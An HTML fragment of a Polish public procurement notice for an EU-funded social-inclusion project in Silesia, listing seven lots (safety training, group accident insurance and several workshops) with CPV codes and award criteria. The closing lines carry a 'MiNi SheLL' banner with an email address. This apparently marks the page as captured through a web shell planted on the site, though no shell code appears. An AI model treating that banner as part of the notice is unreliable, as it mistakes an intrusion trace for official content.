<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Krok w przyszłość realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020 dla osi priorytetowej IX Włączenie społeczne dla działania 9.1 Aktywna integracja dla poddziałania 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - tryb pozakonkursowy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1- przeprowadzenie usługi szkolenia w zakresie BHP - wstępny instruktaż ogólny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1- przeprowadzenie usługi szkolenia w zakresie BHP - wstępny instruktaż ogólny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.55.00.00-4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Ilość przeprowadzonych szkoleń o tematyce odpowiedniej dla danej części - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2- Ubezpieczenie grupowe NNW 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2- Ubezpieczenie grupowe NNW 10 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.21.00-3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Wysokość sumy ubezpieczenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3: Prowadzenie grupowych warsztatów aktywizacji i komunikacji interpersonalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3: Prowadzenie grupowych warsztatów aktywizacji i komunikacji interpersonalnej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Ilość przeprowadzonych szkoleń o tematyce odpowiedniej dla danej części - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4: Prowadzenie grupowych warsztatów poruszania się po rynku pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 4: Prowadzenie grupowych warsztatów poruszania się po rynku pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Ilość przeprowadzonych szkoleń o tematyce odpowiedniej dla danej części - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5: Prowadzenie grupowych warsztatów profilaktyki zdrowotnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 5: Prowadzenie grupowych warsztatów profilaktyki zdrowotnej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Ilość przeprowadzonych szkoleń o tematyce odpowiedniej dla danej części - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część 6: Prowadzenie grupowych warsztatów efektywnego zachowania się w sytuacjach życia codziennego, wzmacnianie postaw prawidłowego funkcjonowania w społeczeństwie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 6: Prowadzenie grupowych warsztatów efektywnego zachowania się w sytuacjach życia codziennego, wzmacnianie postaw prawidłowego funkcjonowania w społeczeństwie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Ilość przeprowadzonych szkoleń o tematyce odpowiedniej dla danej części - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część 7: Prowadzenie grupowych warsztatów gospodarowania budżetem domowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 7: Prowadzenie grupowych warsztatów gospodarowania budżetem domowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Ilość przeprowadzonych szkoleń o tematyce odpowiedniej dla danej części - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com